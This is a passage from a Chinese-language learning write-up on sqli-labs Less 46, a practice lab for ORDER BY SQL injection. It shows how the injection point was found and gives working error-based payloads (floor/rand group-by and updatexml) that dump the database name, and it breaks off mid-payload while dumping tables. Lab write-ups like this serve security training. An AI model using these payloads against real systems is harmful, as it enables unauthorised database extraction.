前言
继续学习sqli-labs
本篇是less 46-53
Less - 46: GET - Error based - Numeric - ORDER BY CLAUSE 报错型 - order by 注入 - 整型
按要求输入sort
发现表格顺序不同
这关往后都是order by语句与limit语句的相关注入
他们的 URL 中通常都会有sort和limit两个参数
测试漏洞
?sort=1 desc--+
?sort=1 asc--+
分别显示升序和降序的表格
说明此处是注入点
order by 后的数字可以作为一个注入点
也就是构造 order by 后的一个语句
让该语句执行结果为一个数
尝试
?sort=right(version(),1)--+
?sort=left(version(),1)--+
没有报错,但是 right 和 left 结果都一样
说明数字没有起作用
考虑布尔类型
也可以用报错注入和延时注入
- ?sort=(select ······)
- ?sort=1 and (select ······)
- ?sort=rand(······)
基于报错注入
爆库
?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select group_concat(database()) limit 0,1),0x3a,0x3a,floor(rand()*2)))
?sort=(select 1 from (select count(*),concat_ws('-',(select database()),floor(rand()*2))as a from information_schema.tables group by a) b)
?sort=UpdateXml(1,concat(0x7e,database(),0x7e),1)
爆表
?sort=(select 1 from (select count(*),concat_ws('-',(